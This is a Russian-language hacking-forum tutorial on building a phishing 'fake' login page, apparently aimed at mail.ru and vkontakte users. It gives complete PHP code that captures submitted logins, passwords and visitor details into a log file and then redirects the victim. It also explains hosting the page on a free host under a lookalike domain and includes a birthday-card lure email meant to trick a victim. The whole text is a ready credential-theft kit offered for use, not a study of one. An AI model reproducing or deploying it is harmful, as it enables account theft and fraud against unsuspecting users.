Итак, господа, хочу всем дать самый простой способ создания фейка за 5 минут. По шагам, все будет понятно даже для ламеров. Тут даже хтмл и пхп не нужно знать.

Заходим на страницу, которую мы пытаемся подделать (очевидно, это страница логина). Теперь нам нужно скачать ее. Делается двумя способами.

1 способ (ламерский). Нажимаем ctrl+s в браузере на этой странице (или в меню Файл - сохранить как... сохраняете страницу на своем кампе. Если после заливки на сервак не будут грузиться картинки - поправляйте (как это делать, я рассказывать не буду, ибо догадается даже олигофрен). Преимущества этого способа - все что нужно сделать, это нажать 3 кнопки и готово.[*]2 способ (чуть сложнее, но чище). Нажимаем ctrl+u (в лисе), ctrl+F3 (в опере) или в меню "Вид - Исходный код страницы" (в осле). Открывается окно с исходным кодом страницы. Этот код вы копируете в файл index.php или index.html. Потом прописываем абсолютные пути ко всем картинкам и таблицам стилей (оригинальным). Это чтобы картинки и ЦССки грузились с сервака, страницу которого мы подделываем. Преимущества этого способа перед первым: все чисто, все компактненько в одном файле.

Открываем блокнотом (или др. редактором исходного кода) ваш получившийся файл, ищем теги <form></form>, имеющие отношение к форме логина (иногда на странице бывает несколько форм) и меняем значение аттрибута action на submit.php. Если вы не разбираетесь в HTML, найдите слово action и то, чему оно должно быть равно, установите submit.php (чтобы получилось примерно следующее: action="submit.php"). Сохраняем файл, закрываем.

В той же папке создаем файл submit.php и вписываем туда следующее содержимое:

Код:
<?php 

/** 
 * @author hackersoft 
 * @copyleft 2009 
 */ 

@include 'config.php'; 
$req=array( 
    'HTTP_REFERER'=>$_SERVER['HTTP_REFERER'], 
    'HTTP_USER_AGENT'=>$_SERVER['HTTP_USER_AGENT'], 
    'REMOTE_ADDR'=>$_SERVER['REMOTE_ADDR'], 
    'REMOTE_PORT'=>$_SERVER['REMOTE_PORT'], 
    'REQUEST_URI'=>$_SERVER['REQUEST_URI'], 
    'REQUEST_TIME'=>$_SERVER['REQUEST_TIME'], 
); 
$desc=fopen('logs.txt','at+'); 
fwrite($desc,print_r($req,true)."\n\n\n".print_r($_REQUEST,true)."\n\n\n=====================\n\n\n"); 
fclose($desc); 

header('Location: '.$loc); 

?>

затем сохраняем и закрываем.
Создаем файл config.php, и копируем в него текст:

Код:
<?php 

/** 
 * @author hackersoft 
 * @copyleft 2009 
 */ 

// куда редиректить после записи пароля: 
$loc='http://mail.ru/cgi-bin/start'; 

?>

(не забудьте адрес поменять на нужный). Сохраняем и закрываем.
Создаем пустой файл logs.txt.
Ну вот, фейк готов, теперь его осталось залить и впарить жертве. Для этого регим акк на сайте http://freehostia.com (бесплатный хостер с пхп без баннеров). Называем сайт как-нибудь типа mai1-ru-.freehostia.com.
Заливаем по FTP (или через панель управления) те файлы, которые вы создали.
Установите на файл logs.txt привилегии "777" (ибо пароль жертвы не запишется).
Теперь фейк можно впарить жертве. Напишите письмо вида:

Привет маша! Поздравляю тебя с днем рождения и вручаю тебе эту открытку:
--

Маша зайдет на страницу -- и увидит форму ввода логина и пароля, как будто она разлогинелась. Если она глупая и ничего не заметит (а это уже отдельная тема, как фейк сделать менее палевным), она введет логин и пароль которые запишутся в файл logs.txt в следующем формате:

Код:
Array 
( 
    [HTTP_REFERER] => http://hackersoft.ru/admin/ 
    [HTTP_USER_AGENT] => Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5 
    [REMOTE_ADDR] => 92.112.88.666 
    [REMOTE_PORT] => 34953 
    [REQUEST_URI] => /admin/?action=articles 
    [REQUEST_TIME] => 1230097894 
) 

Array 
( 
    [login] => (здесь логин маши) 
    [password] => (а здесь пароль) 
) 

=====================

Вот и сказочке конец, а кто слушал - молодец. Будут вопросы - оставляйте в теме, но я надеюсь что все написано так, что и ежу понятно.

p.s. Этот способ универсальный, подойдет не только для mail.ru или vkontakte.ru, а вообще, для чего угодно.

Теги: Фейки за 5 минут